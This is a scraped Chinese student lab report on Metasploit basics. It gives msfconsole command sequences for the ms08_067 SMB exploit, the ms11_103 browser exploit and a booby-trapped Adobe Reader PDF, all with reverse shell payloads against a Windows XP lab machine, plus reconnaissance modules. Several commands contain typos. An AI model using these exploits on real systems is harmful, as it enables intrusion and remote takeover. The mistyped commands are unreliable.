2. 程式人生 > >20155328 網絡攻防 實驗五:MSF基礎應用

20155328 網絡攻防 實驗五:MSF基礎應用

阿新 發佈:2018-05-03
RM AD sta format mage 設定 -o name com

20155328 網絡攻防 實驗五:MSF基礎應用

實踐內容及過程記錄

一、Windows服務滲透攻擊————ms08_067

攻擊機:kali

靶機:WindowsXP(英文版)

第一步,分別查看攻擊機和靶機的IP。
技術分享圖片

技術分享圖片

在kali終端中,輸入msfconsole進入msf控制臺,依次輸入以下指令:

use exploit/windows/smb/ms08_067_netapiuse exploit/windows/smb/ms08_067_netapi

show payloads

set payload generic/shell_reverse_tcp

set LHOST 192.168.127.138

set LPORT 5328

set RHOST 192.168.127.139

set target 0

exploit

技術分享圖片

攻擊成功,可以看到已經獲取了靶機的系統信息:

技術分享圖片

二、瀏覽器滲透攻擊————ms11_103

在kali終端輸入msfconsole打開msf控制臺,輸入以下參數:

技術分享圖片

被攻擊的主機可以看到網頁無法正常打開:

技術分享圖片

回到kali,輸入以下指令:

sessions
sessions -i n//n為顯示的最大進程號

可以看到攻擊成功了。
技術分享圖片

三、針對Adobe Reader的滲透攻擊

在kali中進入msf控制臺,輸入以下指令:

use windows/fileformat/adobe)cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
set FILENAME 20155328.pdf
exploit

生成了PDF:
技術分享圖片

將生成的PDF拷貝到靶機上。

kali中輸入back,進入監聽模塊,輸入以下命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
exploit

技術分享圖片

然後在靶機上打開PDF:

技術分享圖片

攻擊機顯示攻擊成功:

技術分享圖片

四、應用Aux輔助模塊

1.browser_info

在kali終端中輸入show auxiliary,查看aux中都有哪些模塊,最後選中gather/browser_info。

進入到msf控制臺後,依次輸入以下命令:

use auxiliary/gather_browser_info

set SRVHOST 192.168.127.138 //kali的IP

set SRVPORT 5328

exploit

可以看到生成了URL,且Server Start。
技術分享圖片

復制鏈接,在靶機(WindowsXP)中進行訪問:

技術分享圖片

回到kali,可以看到已經獲取了靶機訪問該url的瀏覽器信息。

技術分享圖片

2.arp_sweep

先在kali終端中輸入以下命令,手動創建一個msf所需的數據庫:

service postgresql start
msfdb start

再輸入msfconsole開啟msf,輸入命令use auxiliary/scanner/discovery/arp_sweep進入模塊,設置參數:(RHOSTS填寫kali所在的網段)
技術分享圖片

設定好了以後輸入run,可以看到除了自己主機IP外,還有三個其他IP:

技術分享圖片

在msf中輸入命令db_nmap -O 192.168.127.139(靶機IP),可以看到開啟的端口號即靶機的目標操作系統。
技術分享圖片

基礎問題回答

用自己的話解釋什麽是exploit,payload,encode。

exploit:利用漏洞或一切可利用的東西進行獲取用戶權限、篡改文件信息等操作。

payload:在靶機上執行的一段代碼,可以反彈連接。

encode:對特征碼進行編碼,改變特征碼。

實踐總結與體會

這次實驗主要是做的小模塊比較多,感覺還。。挺厲害的。。再接再厲吧。

20155328 網絡攻防 實驗五:MSF基礎應用

相關推薦

20155328 攻防 實驗MSF基礎應用

RM AD sta format mage 設定 -o name com 20155328 網絡攻防 實驗五:MSF基礎應用 實踐內容及過程記錄 一、Windows服務滲透攻擊————ms08_067 攻擊機:kali 靶機:WindowsXP(英文版) 第一步,分別查看攻

2017-2018-2 20155231《對抗技術》實驗 MSF基礎應用

進行 rar oca aso 哪些 但是 前綴 關閉 搜索 2017-2018-2 20155231《網絡對抗技術》實驗五: MSF基礎應用 實踐目標 掌握信息搜集的最基礎技能與常用工具的使用方法。 實驗內容 (1)各種搜索技巧的應用 比如IP2Location 地理位置

2018-2019-2 20165312《攻防技術》Exp5 MSF基礎應用

bms olt nal 作用 win7 程序 系統 用戶 .html 2018-2019-2 20165312《網絡攻防技術》Exp5 MSF基礎應用 目錄 一、知識點總結 二、攻擊實例 主動攻擊的實踐 ms08_067 generic/shell_reverse_

2018-2019-2 20165303《攻防技術》Exp5 MSF基礎應用

進行 erp alt 基礎應用 1.2 enc 通道 編碼 技術分享 實踐目標 1.主動攻擊實踐ms17_010以及ms08_067 2.針對瀏覽器的攻擊ms13-008(唯一)以及ms11-050以及ms13-069(唯一) 3.針對客戶端的攻擊adobe (Adobe

2018-2019-2 20165329《攻防技術》Exp5 MSF基礎應用

handler 總結 使用 -s sp2 ner 分享圖片 解釋 要求 2018-2019-2 20165329《網絡攻防技術》Exp5 MSF基礎應用 一、實驗 一個主動攻擊實踐,ms08_067 ; 一個針對瀏覽器的攻擊,MS11-050 ; 一個針對客戶端的攻

2018-2019-2 對抗技術 20165230 Exp5 MSF基礎應用

最大 網絡攻擊 如果 oca load search 返回 meta 字符串 目錄 1.實驗內容 2.基礎問題回答 3.實驗內容 任務一:一個主動攻擊實踐

2018-2019-2 對抗技術 20165225 Exp5 MSF基礎應用

code 敏感信息 解決 xpl num nco 體會 windows 安全 2018-2019-2 網絡對抗技術 20165225 Exp5 MSF基礎應用 驗前準備 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 一

2018-2019-2 20165331《對抗技術》Exp5 MSF基礎應用

exploit eric 進入 監聽 學會 smb msf 實驗環境 訪問 2018-2019-2 20165331《網絡對抗技術》Exp5 MSF基礎應用 實驗涉及漏洞 主動攻擊實踐:ms08_067(成功); 針對瀏覽器的攻擊:ms10_046(成功); 針對客戶端的

2017-2018-2 20155315《對抗技術》Exp5 MSF基礎應用

spl table inter lob master type AR .cn 捕獲 實驗目的 學會用metasploit進行簡單的攻擊操作 教程 實驗內容 metasploit中有六個模塊分別是 滲透攻擊模塊(Exploit Modules) 輔助模塊(Auxiliary

20155229《對抗技術》Exp5MSF基礎應用

targe ret 研究 完成 系統類型 show ref coo AR 實驗內容 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 一個主動攻擊實踐,如ms08-067; 一個針對瀏覽器的攻擊,如ms11-050; 一個針

20154309 【對抗技術】Exp5MSF基礎應用

系統訪問 inux 安裝程序 執行 反彈連接 敏感信息 back 很難 其他 20154309 【網絡對抗技術】Exp5:MSF基礎應用 一、原理與實踐說明 1.實踐內容 本實踐目標是掌握metasploit的基本應用方式,掌握重點常用的三種攻擊方式的思路。具體需要完成:

2017-2018-2 20155310『對抗技術』Exp5MSF基礎應用

set ons http load options 進行 中文 實驗 滲透測試 2017-2018-2 20155310『網絡對抗技術』Exp5:MSF基礎應用 基礎問題回答 用自己的話解釋什麽是exploit,payload,encode exploit:由攻擊者或滲透測

2018-2019-2 20165313 《對抗技術》 Exp5MSF基礎應用

耐心 內容 類型 sca 可能 依次 同時 flash 文件 實踐要求與問題回答 1. 實踐內容(3.5分) 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 1.1一個主動攻擊實踐,如ms08_067; (1分) 1.2 一

2018-2019-2 20165209 《對抗技術》Exp5MSF基礎應用

使用 掃描 總結 rev hand div 所有權 基礎 幹什麽 2018-2019-2 20165209 《網絡對抗技術》Exp5:MSF基礎應用 目錄 一、基礎問題回答和實驗內容 二、攻擊實例 主動攻擊的實踐 ms08_067 payload/generic/s

20155201 攻防技術 實驗 MSF基礎應用

HR creat 5.5 frame CP 控制臺 基礎 ado 解釋 20155201 網絡攻防技術 實驗五 MSF基礎應用 一、實踐內容 一個主動攻擊實踐,如ms08_067 一個針對瀏覽器的攻擊,如ms11_050 一個針對客戶端的攻擊,如Adobe 成功應用任何一

信息安全技術 實驗 攻防技術 20155202 張旭

mach 無法連接 風險 scan 自己 操作系統 指紋 c盤 運行 信息安全技術 實驗五 網絡攻防技術 20155202 練習一 信息收集 一、 實驗目的 該實驗為驗證性實驗。 ? 了解信息搜集的一般步驟 ? 學會熟練使用ping命令 ? 學會利用Nmap等工具進行信息

#20155235 《攻防實驗二 後門原理與實踐

down mage 安全意識 alt llc 如何 使用 基礎 運行 20155235 《網絡攻防》 實驗二 後門原理與實踐 實驗目的 建立一個後門連接是如此的簡單,功能又如此強大。通過親手實踐並了解這一事實,從而提高自己的安全意識 。 實驗內容 (1)使用netcat獲取

2017-2018-2 20179216 《攻防與實踐》第周總結

通過 advance 會話 輕量級 兩個 構造 點擊 審計 添加 教材內容總結 1. Web應用程序體系結構 Web應用程序是一種使用瀏覽器在互聯網或企業內部網上進行訪問操作的應用軟件形態。Web應用體系有瀏覽器作為客戶端完成數據顯示和展示內容的渲染;由功能強大的服務器完

2017-2018-2 20179207 《攻防技術》第周作業

baidu mar solar 基於 釣魚 綜合 暴力枚舉 網絡 網站搭建 kali漏洞分析之數據庫評估(一)(二) web層與數據庫連接的漏洞在安全測試中並不少見,owasp曾經的top之首sql註入漏洞。 數據庫評估軟件 1.bbqsql 是一個pyth編寫的盲註工具,

2017-2018-2 20179202《攻防技術》第周作業

line gre 調試工具 soft cookie值 監聽端口 reflect 寫實 搜索 漏洞分析之數據庫評估(一) BBQSQL 一種用Pyhthon寫的SQL盲註框架。當發動QL註入漏洞攻擊時,它將非常有用。BBQSQL是半自動工具,允許許多難以觸發的SQL註入變